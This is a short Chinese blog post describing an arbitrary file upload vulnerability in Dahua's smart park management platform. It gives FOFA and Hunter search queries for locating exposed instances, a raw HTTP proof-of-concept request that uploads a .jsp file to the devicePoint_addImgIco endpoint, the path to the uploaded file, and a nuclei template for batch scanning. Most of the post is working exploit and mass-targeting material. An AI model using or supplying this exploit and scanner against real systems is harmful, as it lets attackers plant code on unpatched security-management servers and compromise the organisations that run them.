大华智慧园区综合管理平台devicePoint_addImgIco任意文件上传漏洞

漏洞简介

大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。大华智慧园区设备开放了文件上传功能,但未在上传的文件类型、大小、格式、路径等方面进行严格的限制和过滤,导致攻击者可以通过构造恶意文件并上传到设备上。

漏洞复现

fofa语句:"/WPMS/asset/lib/gridster/"app="dahua-智慧园区综合管理平台"
鹰图语句:web.body="/WPMS/asset/lib/gridster/"
登录页面如下:

POC:

POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
Content-Type: multipart/form-data; boundary=f3aeb22be281d77542546a2f71e20982
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Host: IP
Content-Length: 226
Expect: 100-continue
Connection: close

--f3aeb22be281d77542546a2f71e20982
Content-Disposition: form-data; name="upload"; filename="a.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary

h4jc4K1lT4
--f3aeb22be281d77542546a2f71e20982--


访问上传的文件
/upload/emap/society_new/ico_res_ffe925764fee_on.jsp

nuclei批量yaml文件

id: Dahua_devicePoint_addImgIco_upload
info:
  name: 大华智慧园区综合管理平台devicePoint_addImgIco任意文件上传漏洞
  author: mhb17
  severity: critical
  description: 大华智慧园区综合管理平台devicePoint_addImgIco任意文件上传漏洞
  reference:
    - https://
  tags: fileupload
requests:
  - raw:
      - |-
        POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
        Content-Type: multipart/form-data; boundary=f3aeb22be281d77542546a2f71e20982
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
        Host: {{Hostname}}
        Content-Length: 226
        Expect: 100-continue
        Connection: close

        --f3aeb22be281d77542546a2f71e20982
        Content-Disposition: form-data; name="upload"; filename="b.jsp"
        Content-Type: application/octet-stream
        Content-Transfer-Encoding: binary

        h4jc4K1lT4
        --f3aeb22be281d77542546a2f71e20982--
    matchers:
      - type: word
        part: body
        words:
          - '"code":1'
posted @ 2023-08-29 09:39  学安全的小白  阅读(602)  评论(0编辑  收藏  举报